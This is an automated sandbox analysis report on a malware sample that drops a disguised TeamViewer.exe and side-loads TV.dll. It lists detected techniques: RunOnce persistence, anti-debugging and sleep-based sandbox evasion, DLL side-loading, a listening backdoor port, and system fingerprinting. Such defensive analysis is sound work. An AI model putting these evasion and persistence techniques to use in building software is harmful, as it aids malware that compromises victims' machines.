Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA, 2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FB7F9 3_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004DC9D6 3_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00500C6A 3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep count: 269 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep time: -134500s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5720 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
Contains functionality to query network adapater information
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 3_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetAdaptersInfo, 3_2_6F3382F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6F3328B0
Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp Binary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Open window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy, 2_2_6F33B510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6F33C1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6F33C1E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6F33C1E2

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle, 2_2_6F335130
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 2_2_6F333390
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp Binary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_xtoa_s@20, 3_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 3_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA, 3_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 3_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 3_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 3_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_0054B459
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen, 1_2_00405B88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_6F338510

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 3_2_00511D6F
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs